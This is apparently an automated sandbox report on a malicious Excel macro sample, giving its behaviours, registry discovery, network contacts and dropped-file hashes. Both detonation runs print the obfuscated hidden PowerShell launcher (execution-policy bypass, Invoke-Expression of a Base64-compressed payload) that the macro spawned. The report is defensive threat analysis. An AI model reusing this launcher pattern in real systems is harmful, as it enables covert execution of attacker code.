Malware Analysis Report

2025-06-16 00:47

Sample ID: 241107-1ect3sygma
Target: 455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824
SHA256: 455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824
Tags: macro, macro_on_action, discovery, execution
Score: 10/10

Table of Contents

Analysis Overview
    MITRE ATT&CK
        Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: 455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824

Threat Level: Known bad

The file 455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824 was found to be: Known bad.

Malicious Activity Summary

Tags: macro, macro_on_action, discovery, execution

Process spawned unexpected child process
Suspicious Office macro
Blocklisted process makes network request
Office macro that triggers on suspicious action
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-07 21:33

Signatures

Office macro that triggers on suspicious action

Tags: macro, macro_on_action

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Suspicious Office macro

Tags: macro

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-07 21:33
Reported: 2024-11-07 21:34
Platform: win7-20240903-en
Max time kernel: 15s
Max time network: 20s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824.xls

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Command and Scripting Interpreter: PowerShell

Tags: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

System Location Discovery: System Language Discovery

Tags: discovery

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824.xls

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" 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 \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | store.cloudxlarge.com | udp
US | 52.1.52.89:443 | store.cloudxlarge.com | tcp
US | 8.8.8.8:53 | crt.rootg2.amazontrust.com | udp
FR | 3.164.163.59:80 | crt.rootg2.amazontrust.com | tcp
US | 8.8.8.8:53 | dev-eupfdo1whf80ldiv.eu.auth0.com | udp
US | 104.19.152.19:443 | dev-eupfdo1whf80ldiv.eu.auth0.com | tcp
US | 104.19.152.19:443 | dev-eupfdo1whf80ldiv.eu.auth0.com | tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabE4C6.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarE4E8.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f8eb24dbc39f7728ae550d4a8a251483
SHA1 42ecbf852de98f29b60a84b9302bf732d43f7b09
SHA256 602e4cfc30d8355756c2f058041f793107959252da0954e5c0675190970b5285
SHA512 a993ea954d723534d2a4e8313f6e3d2f017c2f17faed6126c00184f817db2f92d15c197a77d8291d3e3d17c4f565f18f79a3209a7d35dfa0e7f606510d406f74


Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-07 21:33
Reported: 2024-11-07 21:34
Platform: win10v2004-20241007-en
Max time kernel: 46s
Max time network: 39s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Command and Scripting Interpreter: PowerShell

Tags: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe | N/A

System Location Discovery: System Language Discovery

Tags: discovery

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe | N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824.xls"

C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe

C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" 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 \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | store.cloudxlarge.com | udp
US | 52.1.52.89:443 | store.cloudxlarge.com | tcp
US | 8.8.8.8:53 | dev-eupfdo1whf80ldiv.eu.auth0.com | udp
US | 104.19.153.19:443 | dev-eupfdo1whf80ldiv.eu.auth0.com | tcp
US | 8.8.8.8:53 | 89.52.1.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 19.153.19.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp
US | 104.19.153.19:443 | dev-eupfdo1whf80ldiv.eu.auth0.com | tcp
US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zol0pqoe.ls3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 4491d24d4900f03ef4ec8bd1006c98e6
SHA1 bc04962ed8555a3faf9894ea0cd9b8d91deb43ab
SHA256 d7d615933115e8dfceb5e997bbbb839ab1930db2b11776e98c9207dadda28331
SHA512 a3eb141cdbdd9067c59abf1092052a0ee3e29e03e810a643db85bb7326c841add542143f2123faf90d63a004b9722c90d408e07a991a5fd6ce9b47e6b24056a1